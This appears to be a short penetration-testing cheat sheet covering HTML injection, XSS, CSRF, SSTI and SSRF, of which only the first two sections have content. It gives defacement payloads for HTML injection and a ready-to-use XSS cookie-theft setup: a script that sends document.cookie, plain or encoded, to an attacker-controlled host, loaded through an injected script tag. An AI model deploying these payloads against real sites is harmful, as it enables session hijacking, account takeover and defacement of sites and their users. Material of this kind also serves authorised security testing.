XSS / HTMLi / (S/C)SRF / SSTI

01. HTML Injection

  • Basic Test Payloads

<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>

<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>

02. Cross Site Scripting (XSS)

  • Steal Cookie

## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))

## ------------------| Payload 
<script src="http://<IP>/h4rithd.js"></script>
  • Payloads

  • Server Side XSS (Dynamic PDF)

  • Other APIs

03. Cross-Site Request Forgery (CSRF)

  • Create Payload

04. Server-Side Template Injection (SSTI)

source:PayloadsAllTheThings
  • Click here for list of payloads.

05. Server-Side Request Forgery (SSRF)

Last updated